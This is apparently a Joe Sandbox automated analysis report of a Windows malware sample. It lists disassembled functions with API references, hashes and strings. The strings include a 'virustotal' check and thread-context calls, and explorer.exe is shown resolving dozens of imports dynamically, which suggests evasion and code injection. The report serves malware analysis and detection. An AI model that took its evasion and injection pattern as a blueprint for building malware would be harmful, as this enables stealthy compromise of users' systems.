Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: _getptd
String ID: MOC$RCC$csm
API String ID: 3186804695-2671469338
Opcode ID: 9ac3fb7d83b05eeba75a9489a1b74f6f4d5fc62a8545616f06d34283c85bf227
Instruction ID: 48b6a297b0004afddf07bc467e57f63b6f399396bee87831de0c5d1d0e2a4645
Opcode Fuzzy Hash: 9ac3fb7d83b05eeba75a9489a1b74f6f4d5fc62a8545616f06d34283c85bf227
Instruction Fuzzy Hash: 05F0123590A30AE5E7552B60C3053B829A0FF58B15FCD84BDCA8A8A7C2DF6C6494CA12

Function 00007FF68A184250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68A18427F

Part of subcall function 00007FF68A19CAD4: _lock.LIBCMT ref: 00007FF68A19CAE6

std::exception::exception.LIBCMT ref: 00007FF68A1842CE

Part of subcall function 00007FF68A18BB90: std::exception::_Copy_str.LIBCMT ref: 00007FF68A18BBAF

_CxxThrowException.LIBCMT ref: 00007FF68A1842EB

Part of subcall function 00007FF68A190FE0: RtlPcToFileHeader.NTDLL ref: 00007FF68A19106F
Part of subcall function 00007FF68A190FE0: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68A19AE65), ref: 00007FF68A1910AE

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF68A1842F7

Strings

bad locale name, xrefs: 00007FF68A1842B8

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Exceptionstd::_$Copy_strFileHeaderLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow_lockstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 3392404118-1405518554
Opcode ID: 614111853f4073aa0dfe77f726be9d54deaf26b0356bd57d534be48d4adb14b6
Instruction ID: ba92179d0a287115842c0b76f703c0411fe2996031e221bfa294a03d88db356f
Opcode Fuzzy Hash: 614111853f4073aa0dfe77f726be9d54deaf26b0356bd57d534be48d4adb14b6
Instruction Fuzzy Hash: 7221AE3221AB81DAD750CF24E8801AD7BB4FF58BA4B945279DADC83799EF38D554C340

Function 00007FF68A19C05C Relevance: 7.7, APIs: 5, Instructions: 153COMMON

Download Yara Rule

APIs

fgetc.LIBCMT ref: 00007FF68A19C111

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: fgetc
String ID:
API String ID: 2807381905-0
Opcode ID: 53e39cc6407e9cb1907d60f31e8babac8dd30bbee1de0b2841f7e44098a8426b
Instruction ID: 6f6f69d3d9e6fea74fd9dd48161ce32983dbb8294630a1ce09c535fa992b1e00
Opcode Fuzzy Hash: 53e39cc6407e9cb1907d60f31e8babac8dd30bbee1de0b2841f7e44098a8426b
Instruction Fuzzy Hash: 0D714932606A41E9EB10CF75C5903AC37A5FB44B58F98067AEE8D83B99DF38D554C350

Function 00007FF68A195500 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00007FF68A195562
_isleadbyte_l.LIBCMT ref: 00007FF68A195592
MultiByteToWideChar.KERNEL32 ref: 00007FF68A1955D1
MultiByteToWideChar.KERNEL32 ref: 00007FF68A19561F
_errno.LIBCMT ref: 00007FF68A195629

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: f1762a1455b7082dca170153694eb374a3a880db095f81f52f5ad002d99a4c8c
Instruction ID: 2b89d832b8fb5389fd9ea9cd288dc6e68f707b960df6a30a9fffd7338dc40125
Opcode Fuzzy Hash: f1762a1455b7082dca170153694eb374a3a880db095f81f52f5ad002d99a4c8c
Instruction Fuzzy Hash: 1A41AF3260A381D6F7608B15A2402396BA2FF44BA4F985179EFCDA7B96DE3DE445C700

Function 00007FF68A19D808 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF68A19D815

Part of subcall function 00007FF68A191F68: _getptd_noexit.LIBCMT ref: 00007FF68A191F6E

_inconsistency.LIBCMT ref: 00007FF68A19D823

Part of subcall function 00007FF68A194D8C: DecodePointer.KERNEL32 ref: 00007FF68A194D97

_getptd.LIBCMT ref: 00007FF68A19D828
_inconsistency.LIBCMT ref: 00007FF68A19D844
_getptd.LIBCMT ref: 00007FF68A19D854

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: _getptd$_inconsistency$DecodePointer_getptd_noexit
String ID:
API String ID: 3566995948-0
Opcode ID: fe93ce71788187d4c9f954875e9679249d1b03fcf16c53c5a3782db5a84888f0
Instruction ID: 9c3559204a9e13a3adf0b81ec51ad3afcf5d2af5fc267429b626a641f50d4d18
Opcode Fuzzy Hash: fe93ce71788187d4c9f954875e9679249d1b03fcf16c53c5a3782db5a84888f0
Instruction Fuzzy Hash: E5F0FB1191A686E0EA516B55D2411BC5A60BF48F84F8C45BDDECC47387DE18D490C351

Function 00007FF68A185324 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68A185264: GetSystemDirectoryW.KERNEL32 ref: 00007FF68A1852A6

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FF68A18558D
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FF68A18565C

Part of subcall function 00007FF68A19C9B4: std::ios_base::_Tidy.LIBCPMT ref: 00007FF68A19C9D9

Strings

virustotal, xrefs: 00007FF68A1854B3

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: std::ios_base::_$Ios_base_dtor$DirectorySystemTidy
String ID: virustotal
API String ID: 3076328628-830712347
Opcode ID: 7c30ee922520a8f81efd21c2b74a54d0bab45ad67358980b01cadac002a257c8
Instruction ID: be493158aeebe6b68b3af896302902d20f1999b2148ee75d8e30db892c3695a3
Opcode Fuzzy Hash: 7c30ee922520a8f81efd21c2b74a54d0bab45ad67358980b01cadac002a257c8
Instruction Fuzzy Hash: 35A1BE22A55B8195EB20CF24D8813ED7B61FF89798F505239EECC87A99DF38D504C340

Function 00007FF68A18C51C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 00007FF68A18C52A
malloc.LIBCMT ref: 00007FF68A18C536

Part of subcall function 00007FF68A18CA08: _FF_MSGBANNER.LIBCMT ref: 00007FF68A18CA38
Part of subcall function 00007FF68A18CA08: _NMSG_WRITE.LIBCMT ref: 00007FF68A18CA42
Part of subcall function 00007FF68A18CA08: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF68A18F770,?,?,?,00007FF68A193E30,?,?,?,00007FF68A193D2F,?,?,00000000,00007FF68A19206E), ref: 00007FF68A18CA5D
Part of subcall function 00007FF68A18CA08: _callnewh.LIBCMT ref: 00007FF68A18CA76
Part of subcall function 00007FF68A18CA08: _errno.LIBCMT ref: 00007FF68A18CA81
Part of subcall function 00007FF68A18CA08: _errno.LIBCMT ref: 00007FF68A18CA8C

_CxxThrowException.LIBCMT ref: 00007FF68A18C57F

Part of subcall function 00007FF68A190FE0: RtlPcToFileHeader.NTDLL ref: 00007FF68A19106F
Part of subcall function 00007FF68A190FE0: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68A19AE65), ref: 00007FF68A1910AE

Strings

bad allocation, xrefs: 00007FF68A18C546

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Exception_callnewh_errno$AllocateFileHeaderHeapRaiseThrowmalloc
String ID: bad allocation
API String ID: 1425038354-2104205924
Opcode ID: e4c39169c09cded51a25f3a767d414fe08df9f2a4f193daad58e20fe5f83f0a0
Instruction ID: ba21277372282e1603481e97638a2fef3cc736bb9c19bd80c4fe57512ceb8bd9
Opcode Fuzzy Hash: e4c39169c09cded51a25f3a767d414fe08df9f2a4f193daad58e20fe5f83f0a0
Instruction Fuzzy Hash: E7018E61B4E74BE1EE14DB51A1411B96B94BF44784F4800B8EEDD87B96EE3CE195C700

Function 00007FF68A181428 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32 ref: 00007FF68A18146D
wprintf.LIBCMT ref: 00007FF68A18147E

Part of subcall function 00007FF68A18C3A4: _errno.LIBCMT ref: 00007FF68A18C3C9
Part of subcall function 00007FF68A18C3A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF68A18C3D4

GetThreadContext.KERNEL32 ref: 00007FF68A1814BC

Strings

Wow64 cannot get context!, xrefs: 00007FF68A181477

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: ContextThread$Wow64_errno_invalid_parameter_noinfowprintf
String ID: Wow64 cannot get context!
API String ID: 2477128119-1106426053
Opcode ID: 4999a02bfc8a9acc23dd043b8d36f2ea78b7b9e6abab2f354ccf68f0371edbc1
Instruction ID: d1e3dece416bc3889b25e2c03c1c1f8e7c243d1bea41868e2cec0c98d39d7e03
Opcode Fuzzy Hash: 4999a02bfc8a9acc23dd043b8d36f2ea78b7b9e6abab2f354ccf68f0371edbc1
Instruction Fuzzy Hash: 9B115422B5D586D1EA20DB21D4553BAABA1FF88B48F844079DDCDC7656DF3CE109CB40

Function 00007FF68A1A4A0A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68A19D808: _getptd.LIBCMT ref: 00007FF68A19D815
Part of subcall function 00007FF68A19D808: _inconsistency.LIBCMT ref: 00007FF68A19D823
Part of subcall function 00007FF68A19D808: _getptd.LIBCMT ref: 00007FF68A19D828
Part of subcall function 00007FF68A19D808: _inconsistency.LIBCMT ref: 00007FF68A19D844

__DestructExceptionObject.LIBCMT ref: 00007FF68A1A4A57
_getptd.LIBCMT ref: 00007FF68A1A4A5D
_getptd.LIBCMT ref: 00007FF68A1A4A70

Part of subcall function 00007FF68A19D898: _getptd.LIBCMT ref: 00007FF68A19D8A1

Strings

csm, xrefs: 00007FF68A1A4A2A

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: _getptd$_inconsistency$DestructExceptionObject
String ID: csm
API String ID: 2821275340-1018135373
Opcode ID: 8df5b08c0c95267d4fc504f4daeca9d20b75a67ec837629c271e3000a9b8d5ad
Instruction ID: e2fc7b43599227c67db801e947eee7937f7d2cc141864d1afa4c66053e96fcb5
Opcode Fuzzy Hash: 8df5b08c0c95267d4fc504f4daeca9d20b75a67ec837629c271e3000a9b8d5ad
Instruction Fuzzy Hash: 7D01A722906243D5D7609F31C5812BC2761FF46B4CF4C5479DDAE9A746CF28E4C5C341

Function 00007FF68A189420 Relevance: 6.1, APIs: 4, Instructions: 146COMMON

Download Yara Rule

APIs

fgetwc.LIBCMT ref: 00007FF68A1894DC

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: fgetwc
String ID:
API String ID: 2948136663-0
Opcode ID: 270a7e8411d6cd5abbe19e84f8925f05c23d6076662a07ad26dd70cf8d972d8c
Instruction ID: d31509c9380df05e2f9314b8e9f3eae906d427e2e44cd6086dbb5ec5144a6ae6
Opcode Fuzzy Hash: 270a7e8411d6cd5abbe19e84f8925f05c23d6076662a07ad26dd70cf8d972d8c
Instruction Fuzzy Hash: 97611472646E41E8EB608F25C0903AC37A5FF48B98F50467AEE9E87B99DF38D554C340

Function 00007FF68A19CC84 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

_wfsopen.LIBCMT ref: 00007FF68A19CC19
fclose.LIBCMT ref: 00007FF68A19CC26
_wfsopen.LIBCMT ref: 00007FF68A19CC3B
fseek.LIBCMT ref: 00007FF68A19CC55

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: _wfsopen$fclosefseek
String ID:
API String ID: 1261181034-0
Opcode ID: d296ae792a9aff958ac7c05d1efbcdad30604534304ee641b514fefb29055e6a
Instruction ID: 8d8c1b868cef7dea815b02392b6b031228fe90cc39209cd1becf42433228516d
Opcode Fuzzy Hash: d296ae792a9aff958ac7c05d1efbcdad30604534304ee641b514fefb29055e6a
Instruction Fuzzy Hash: A2218021B1AA42E9EA64961A97417756E91BF48BC4F9C40B8CFCEC7791DE2DE401C300

Function 00007FF68A1875E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_time64.LIBCMT ref: 00007FF68A18769B

Part of subcall function 00007FF68A18EE98: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF68A1876A0), ref: 00007FF68A18EEA6

Part of subcall function 00007FF68A18E6BC: _getptd.LIBCMT ref: 00007FF68A18E6C4

rand.LIBCMT ref: 00007FF68A1876AD

Part of subcall function 00007FF68A18E690: _getptd.LIBCMT ref: 00007FF68A18E694

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 00007FF68A18761C

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Time_getptd$FileSystem_time64rand
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
API String ID: 603874196-768110321
Opcode ID: 7199f471a72000376f316458dbe7da9a004cb7d33198a7dd0b0b46129a5e6147
Instruction ID: c5c0080743cad2c3d4148659bf29d2b387b4da50d7e2022751089fcab3fbc9c9
Opcode Fuzzy Hash: 7199f471a72000376f316458dbe7da9a004cb7d33198a7dd0b0b46129a5e6147
Instruction Fuzzy Hash: BD313A32B0AB65D9EB009BA5A8513AC3BB5BB48794F5001B9DE9CA7795EF3CA054C340

Analysis Process: explorer.exePID: 2580, Parent PID: 7152COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	98.3%
Signature Coverage:	11.9%
Total number of Nodes:	402
Total number of Limit Nodes:	18

Executed Functions

Function 0F3C2854 Relevance: 676.7, APIs: 171, Strings: 215, Instructions: 1169
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0F3C34AF
GetProcAddress.KERNEL32 ref: 0F3C34BB
LoadLibraryA.KERNEL32 ref: 0F3C34E0
LoadLibraryA.KERNEL32 ref: 0F3C34F5
LoadLibraryA.KERNEL32 ref: 0F3C3505
LoadLibraryA.KERNEL32 ref: 0F3C351A
LoadLibraryA.KERNEL32 ref: 0F3C352A
LoadLibraryA.KERNEL32 ref: 0F3C353F
LoadLibraryA.KERNEL32 ref: 0F3C354F
LoadLibraryA.KERNEL32 ref: 0F3C355F
LoadLibraryA.KERNEL32 ref: 0F3C356F
LoadLibraryA.KERNEL32 ref: 0F3C357F
LoadLibraryA.KERNEL32 ref: 0F3C358F
LoadLibraryA.KERNEL32 ref: 0F3C359F
GetProcAddress.KERNEL32 ref: 0F3C35B9
GetProcAddress.KERNEL32 ref: 0F3C35ED
GetProcAddress.KERNEL32 ref: 0F3C3609
GetProcAddress.KERNEL32 ref: 0F3C3625
GetProcAddress.KERNEL32 ref: 0F3C3641
GetProcAddress.KERNEL32 ref: 0F3C365D
GetProcAddress.KERNEL32 ref: 0F3C3674
GetProcAddress.KERNEL32 ref: 0F3C368B
GetProcAddress.KERNEL32 ref: 0F3C36A7
GetProcAddress.KERNEL32 ref: 0F3C36C3
GetProcAddress.KERNEL32 ref: 0F3C36DF
GetProcAddress.KERNEL32 ref: 0F3C36F6
GetProcAddress.KERNEL32 ref: 0F3C3712
GetProcAddress.KERNEL32 ref: 0F3C3729
GetProcAddress.KERNEL32 ref: 0F3C3740
GetProcAddress.KERNEL32 ref: 0F3C3757
GetProcAddress.KERNEL32 ref: 0F3C3773
GetProcAddress.KERNEL32 ref: 0F3C378F
GetProcAddress.KERNEL32 ref: 0F3C37AB
GetProcAddress.KERNEL32 ref: 0F3C37C7
GetProcAddress.KERNEL32 ref: 0F3C37E3
GetProcAddress.KERNEL32 ref: 0F3C37FF
GetProcAddress.KERNEL32 ref: 0F3C381B
GetProcAddress.KERNEL32 ref: 0F3C3832
GetProcAddress.KERNEL32 ref: 0F3C3849
GetProcAddress.KERNEL32 ref: 0F3C3860
GetProcAddress.KERNEL32 ref: 0F3C387F
GetProcAddress.KERNEL32 ref: 0F3C3896
GetProcAddress.KERNEL32 ref: 0F3C38AD
GetProcAddress.KERNEL32 ref: 0F3C38C4
GetProcAddress.KERNEL32 ref: 0F3C38DB
GetProcAddress.KERNEL32 ref: 0F3C38F2
GetProcAddress.KERNEL32 ref: 0F3C3909
GetProcAddress.KERNEL32 ref: 0F3C3920
GetProcAddress.KERNEL32 ref: 0F3C3937
GetProcAddress.KERNEL32 ref: 0F3C394E
GetProcAddress.KERNEL32 ref: 0F3C3965
GetProcAddress.KERNEL32 ref: 0F3C397C
GetProcAddress.KERNEL32 ref: 0F3C3993
GetProcAddress.KERNEL32 ref: 0F3C39AA
GetProcAddress.KERNEL32 ref: 0F3C39C1
GetProcAddress.KERNEL32 ref: 0F3C39D8
GetProcAddress.KERNEL32 ref: 0F3C39EF
GetProcAddress.KERNEL32 ref: 0F3C3A06
GetProcAddress.KERNEL32 ref: 0F3C3A1D
GetProcAddress.KERNEL32 ref: 0F3C3A3C
GetProcAddress.KERNEL32 ref: 0F3C3A53
GetProcAddress.KERNEL32 ref: 0F3C3A6F
GetProcAddress.KERNEL32 ref: 0F3C3A86
GetProcAddress.KERNEL32 ref: 0F3C3AA2
GetProcAddress.KERNEL32 ref: 0F3C3ABE
GetProcAddress.KERNEL32 ref: 0F3C3ADA
GetProcAddress.KERNEL32 ref: 0F3C3AF6
GetProcAddress.KERNEL32 ref: 0F3C3B12
GetProcAddress.KERNEL32 ref: 0F3C3B29
GetProcAddress.KERNEL32 ref: 0F3C3B40
GetProcAddress.KERNEL32 ref: 0F3C3B57
GetProcAddress.KERNEL32 ref: 0F3C3B6E
GetProcAddress.KERNEL32 ref: 0F3C3B85
GetProcAddress.KERNEL32 ref: 0F3C3B9C
GetProcAddress.KERNEL32 ref: 0F3C3BB8
GetProcAddress.KERNEL32 ref: 0F3C3BD4
GetProcAddress.KERNEL32 ref: 0F3C3BF0
GetProcAddress.KERNEL32 ref: 0F3C3C07
GetProcAddress.KERNEL32 ref: 0F3C3C1E
GetProcAddress.KERNEL32 ref: 0F3C3C3A
GetProcAddress.KERNEL32 ref: 0F3C3C51
GetProcAddress.KERNEL32 ref: 0F3C3C68
GetProcAddress.KERNEL32 ref: 0F3C3C7F
GetProcAddress.KERNEL32 ref: 0F3C3C96
GetProcAddress.KERNEL32 ref: 0F3C3CAD
GetProcAddress.KERNEL32 ref: 0F3C3CCC
GetProcAddress.KERNEL32 ref: 0F3C3CE3
GetProcAddress.KERNEL32 ref: 0F3C3CFA
GetProcAddress.KERNEL32 ref: 0F3C3D11
GetProcAddress.KERNEL32 ref: 0F3C3D28
GetProcAddress.KERNEL32 ref: 0F3C3D3F
GetProcAddress.KERNEL32 ref: 0F3C3D56
GetProcAddress.KERNEL32 ref: 0F3C3D6D
GetProcAddress.KERNEL32 ref: 0F3C3D84
GetProcAddress.KERNEL32 ref: 0F3C3D9B
GetProcAddress.KERNEL32 ref: 0F3C3DB2
GetProcAddress.KERNEL32 ref: 0F3C3DC9
GetProcAddress.KERNEL32 ref: 0F3C3DE0
GetProcAddress.KERNEL32 ref: 0F3C3DF7
GetProcAddress.KERNEL32 ref: 0F3C3E0E
GetProcAddress.KERNEL32 ref: 0F3C3E25
GetProcAddress.KERNEL32 ref: 0F3C3E3C
GetProcAddress.KERNEL32 ref: 0F3C3E53
GetProcAddress.KERNEL32 ref: 0F3C3E6A
GetProcAddress.KERNEL32 ref: 0F3C3E81
GetProcAddress.KERNEL32 ref: 0F3C3E98
GetProcAddress.KERNEL32 ref: 0F3C3EAF
GetProcAddress.KERNEL32 ref: 0F3C3EC6
GetProcAddress.KERNEL32 ref: 0F3C3EDD
GetProcAddress.KERNEL32 ref: 0F3C3EFC
GetProcAddress.KERNEL32 ref: 0F3C3F13
GetProcAddress.KERNEL32 ref: 0F3C3F2A
GetProcAddress.KERNEL32 ref: 0F3C3F41
GetProcAddress.KERNEL32 ref: 0F3C3F58
GetProcAddress.KERNEL32 ref: 0F3C3F6F
GetProcAddress.KERNEL32 ref: 0F3C3F86
GetProcAddress.KERNEL32 ref: 0F3C3FA5
GetProcAddress.KERNEL32 ref: 0F3C3FBC
GetProcAddress.KERNEL32 ref: 0F3C3FD3
GetProcAddress.KERNEL32 ref: 0F3C3FEA
GetProcAddress.KERNEL32 ref: 0F3C4001
GetProcAddress.KERNEL32 ref: 0F3C4018
GetProcAddress.KERNEL32 ref: 0F3C402F
GetProcAddress.KERNEL32 ref: 0F3C4046
GetProcAddress.KERNEL32 ref: 0F3C405D
GetProcAddress.KERNEL32 ref: 0F3C4074
GetProcAddress.KERNEL32 ref: 0F3C408B
GetProcAddress.KERNEL32 ref: 0F3C40A2
GetProcAddress.KERNEL32 ref: 0F3C40B9
GetProcAddress.KERNEL32 ref: 0F3C40D0
GetProcAddress.KERNEL32 ref: 0F3C40E7
GetProcAddress.KERNEL32 ref: 0F3C40FE
GetProcAddress.KERNEL32 ref: 0F3C4115
GetProcAddress.KERNEL32 ref: 0F3C412C
GetProcAddress.KERNEL32 ref: 0F3C4143
GetProcAddress.KERNEL32 ref: 0F3C415A
GetProcAddress.KERNEL32 ref: 0F3C4171
GetProcAddress.KERNEL32 ref: 0F3C4188
GetProcAddress.KERNEL32 ref: 0F3C419F
GetProcAddress.KERNEL32 ref: 0F3C41B6
GetProcAddress.KERNEL32 ref: 0F3C41CD
GetProcAddress.KERNEL32 ref: 0F3C41E4
GetProcAddress.KERNEL32 ref: 0F3C41FB
GetProcAddress.KERNEL32 ref: 0F3C4212
GetProcAddress.KERNEL32 ref: 0F3C4229
GetProcAddress.KERNEL32 ref: 0F3C4240
GetProcAddress.KERNEL32 ref: 0F3C4257
GetProcAddress.KERNEL32 ref: 0F3C426E
GetProcAddress.KERNEL32 ref: 0F3C4285
GetProcAddress.KERNEL32 ref: 0F3C42A1
GetProcAddress.KERNEL32 ref: 0F3C42B8
GetProcAddress.KERNEL32 ref: 0F3C42CF
GetProcAddress.KERNEL32 ref: 0F3C42E6
